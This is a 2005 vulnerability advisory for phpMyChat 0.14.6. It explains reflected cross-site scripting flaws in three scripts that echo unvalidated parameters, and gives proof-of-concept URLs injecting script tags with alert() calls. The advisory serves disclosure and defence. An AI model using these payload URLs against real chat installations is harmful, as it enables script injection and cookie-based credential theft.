phpMyChat0146.txt

`phpMyChat Multiple XSS vulnerabilities.  
  
I. BACKGROUND  
phpMyChat is an easy-to-install, easy-to-use multi-room chat based on PHP  
and a database, supporting MySQL, PostgreSQL, and ODBC.  
  
II. DESCRIPTION  
phpMyChat 0.14.6 start_page.css.php, style.css.php, users_popupL.php are  
prone to Cross-site Scripting(XSS) vulnerability. A remote attacker could  
get cookie-based credential information with a specially-crafted URL or  
execute arbitrary web script or HTML.  
  
III. PUBLISH DATE  
2005-12-2  
  
IV. AUTHOR  
Louis Wang, Fortinet Security Research Team (FSRT)(secresearch at fortinet  
dot com.)  
  
V. AFFECTED SOFTWARE  
phpMyChat 0.14.6 is confirmed to be affected.  
Older versions are not verified.  
  
VI. ANALYSIS  
in start_page.css.php and style.css.php  
if (!isset($medium) || $medium == "") $medium = 10;  
$large = round(1.4 * $medium);  
$small = round(0.8 * $medium);  
Parameter $medium is not carefully validated.  
  
in users_popupL.php  
<A HREF="<?php echo("$From?Ver=L&L=$L"); ?>" TARGET="_blank"><?php  
echo(L_CHAT); ?></A>  
Parameter $From is not carefully validated.  
  
VII. Proof of Concept  
http://victimhost/phpmychat/chat/config/start_page.css.php?medium=><script>alert(29837274289742472);</script>&FontName=1  
http://victimhost/phpmychat/chat/config/style.css.php?medium=><script>alert(29837274289742472);</script>&FontName=1  
http://victimhost/phpmychat/chat/users_popupL.php?From="><script>alert(29837274289742472);</script>>&L=english&LastCheck=1133281246&B=0  
  
VIII. SOLUTION  
Input validation will fix the vulnerability.  
  
IX. ADVISORY  
http://www.fortinet.com/FortiGuardCenter/idp.html#fsa  
  
X. REFERENCE  
http://phpmychat.sourceforge.net/  
  
  
  
  
`